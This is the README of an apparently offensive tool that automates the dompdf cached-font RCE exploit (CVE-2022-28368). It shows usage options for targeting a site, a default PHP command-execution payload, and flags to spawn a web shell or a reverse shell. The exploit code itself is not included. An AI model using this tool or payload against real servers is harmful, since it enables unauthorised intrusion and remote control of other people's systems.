# CVE-2022-28368-handler
This repository contains a Python script that handles the majority of the dompdf cached font exploit (CVE-2022-28368); all you need to do is create the request. It will even provide a trigger string to start the exploit :)
## Usage
```
usage: CVE-2022-28368.py [-h] -d DOMPDF_LOCATION [-f FONTNAME] -i HTTP_IP [-p HTTP_PORT] [-P PHP] [-w] [-r]

This script handles the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request

optional arguments:
  -h, --help            show this help message and exit
  -d DOMPDF_LOCATION, --dompdf-location DOMPDF_LOCATION
                        dompdf location on target webserver (example: http://target.com/vendor/dompdf)
  -f FONTNAME, --fontname FONTNAME
                        Exploit font name (default: expfont.php)
  -i HTTP_IP, --http-ip HTTP_IP
                        HTTP listener IP
  -p HTTP_PORT, --http-port HTTP_PORT
                        HTTP listener PORT (default: 80)
  -P PHP, --php PHP     PHP to execute (default: <?php system("whoami"); ?>)
  -w, --webshell        Spawn web shell
  -r, --revshell        Spawn reverse shell (Uses HTTP listener IP and port 9001 by default)
```
### For technical details of the vulnerability, see:
https://positive.security/blog/dompdf-rce
https://github.com/positive-security/dompdf-rce